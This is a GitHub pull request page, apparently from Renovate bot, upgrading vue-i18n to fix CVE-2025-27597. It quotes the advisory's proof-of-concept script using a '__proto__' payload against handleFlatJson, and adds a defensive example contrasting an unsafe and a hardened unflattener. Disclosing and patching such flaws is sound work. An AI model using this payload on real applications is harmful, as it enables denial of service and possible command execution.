
fix(deps): update dependency vue-i18n to v11.1.2 [security] #4003

Open: wants to merge 1 commit into base: master from renovate/npm-vue-i18n-vulnerability
Conversation

renovate[bot] (Contributor) commented Mar 7, 2025

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| vue-i18n (source) | 11.1.0 -> 11.1.2 | age | adoption | passing | confidence |

GitHub Vulnerability Alerts

CVE-2025-27597

Vulnerability type:
Prototype Pollution

Vulnerability Location(s):

```
# v9.1
node_modules/@intlify/message-resolver/index.js

# v9.2 or later
node_modules/@intlify/vue-i18n-core/index.js
```

Description:

The latest versions of @intlify/message-resolver (9.1) and @intlify/vue-i18n-core (9.2 or later) (previous versions might also be affected) are vulnerable to Prototype Pollution through the entry function(s) handleFlatJson. An attacker can supply a payload with an Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) as the minimum consequence.

Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.

PoC:

```shell
# install the package with the latest version
~$ npm install @intlify/[email protected]
# run the script mentioned below
~$ node poc.js
# The expected output (if the code is still vulnerable) is below.
# Note that the output may differ slightly from one function to another.
Before Attack:  {}
After Attack:  {"pollutedKey":123}
```

```js
// poc.js
(async () => {
    const lib = await import('@intlify/message-resolver');
    var someObj = {}
    console.log("Before Attack: ", JSON.stringify({}.__proto__));
    try {
        // for multiple functions, uncomment only one for each execution.
        lib.handleFlatJson ({ "__proto__.pollutedKey": "pollutedValue" })
    } catch (e) { }
    console.log("After Attack: ", JSON.stringify({}.__proto__));
    delete Object.prototype.pollutedKey;
})();
```

Release Notes

intlify/vue-i18n (vue-i18n)

v11.1.2

Compare Source

What's Changed

🔒 Security Fixes

Full Changelog: intlify/vue-i18n@v11.1.1...v11.1.2

v11.1.1

Compare Source

Full Changelog: intlify/vue-i18n@v11.1.0...v11.1.1


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.



This PR was generated by Mend Renovate. View the repository job log.
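A defender's worked example, added here and not code from vue-i18n, @intlify or the advisory: a small flat-JSON unflattener in the style of the `handleFlatJson` behaviour the advisory describes, first without and then with a guard that rejects `__proto__`, `constructor` and `prototype` path segments and only descends into objects it created itself. A probe reports whether `Object.prototype` was touched and cleans up afterwards. The function names, the forbidden-segment list and the constructed payload are assumptions for illustration, not the library's actual fix.

```javascript
// Added example, not code from vue-i18n/@intlify: a flat-JSON unflattener in
// the style of the handleFlatJson behaviour the advisory describes, with and
// without a guard against prototype-polluting path segments. Names, the
// forbidden-segment list and the payload below are assumptions for illustration.

// Path segments that must never be walked or assigned when building nested
// objects from untrusted keys.
const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

// Naive unflatten: turns { 'a.b': 1 } into { a: { b: 1 } } by walking the
// dotted key. Because cur['__proto__'] resolves to Object.prototype, a key
// such as '__proto__.x' writes through to every plain object in the process.
function unflattenUnsafe(flat) {
  const out = {};
  for (const [key, value] of Object.entries(flat)) {
    const parts = key.split('.');
    let cur = out;
    for (let i = 0; i < parts.length - 1; i++) {
      const p = parts[i];
      if (typeof cur[p] !== 'object' || cur[p] === null) cur[p] = {};
      cur = cur[p];
    }
    cur[parts[parts.length - 1]] = value;
  }
  return out;
}

// Hardened unflatten: rejects forbidden segments up front and only descends
// into plain objects this function created itself (own properties), so an
// inherited property can never become the write target.
function unflattenSafe(flat) {
  const out = {};
  for (const [key, value] of Object.entries(flat)) {
    const parts = key.split('.');
    for (const p of parts) {
      if (FORBIDDEN_SEGMENTS.has(p)) {
        throw new TypeError(`rejected unsafe key segment "${p}" in "${key}"`);
      }
    }
    let cur = out;
    for (let i = 0; i < parts.length - 1; i++) {
      const p = parts[i];
      const own = Object.prototype.hasOwnProperty.call(cur, p);
      if (!own || typeof cur[p] !== 'object' || cur[p] === null) cur[p] = {};
      cur = cur[p];
    }
    cur[parts[parts.length - 1]] = value;
  }
  return out;
}

// Probe: run an unflattener on a payload and report whether Object.prototype
// gained probeKey as an own property. Always cleans up so later code is unaffected.
function pollutes(unflatten, payload, probeKey) {
  try {
    unflatten(payload);
  } catch (_e) {
    // The hardened version is expected to throw; the check below still runs.
  }
  const polluted = Object.prototype.hasOwnProperty.call(Object.prototype, probeKey);
  delete Object.prototype[probeKey];
  return polluted;
}

// Constructed payload mirroring the key shape quoted in the advisory's PoC.
const PAYLOAD = { 'greeting.hello': 'Hello', '__proto__.pollutedKey': 'pollutedValue' };

console.log('unsafe unflatten pollutes Object.prototype:', pollutes(unflattenUnsafe, PAYLOAD, 'pollutedKey'));
console.log('safe unflatten pollutes Object.prototype:  ', pollutes(unflattenSafe, PAYLOAD, 'pollutedKey'));
```

Whether to throw or silently drop a rejected key is a policy choice; throwing makes a malformed or hostile message catalogue fail loudly at load time, which is the behaviour most deployments want for a dependency that consumes locale files from many sources.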


cloudflare-workers-and-pages bot commented Mar 7, 2025

Deploying piped with Cloudflare Pages

Latest commit: 0bd79b3
Status: ✅  Deploy successful!
Preview URL: https://19508500.piped.pages.dev
Branch Preview URL: https://renovate-npm-vue-i18n-vulner.piped.pages.dev


@renovate renovate bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from fad0074 to 4bcccef Compare March 10, 2025 05:55
@renovate renovate bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from 4bcccef to 0bd79b3 Compare March 17, 2025 07:33
Labels: None yet
Projects: None yet
0 participants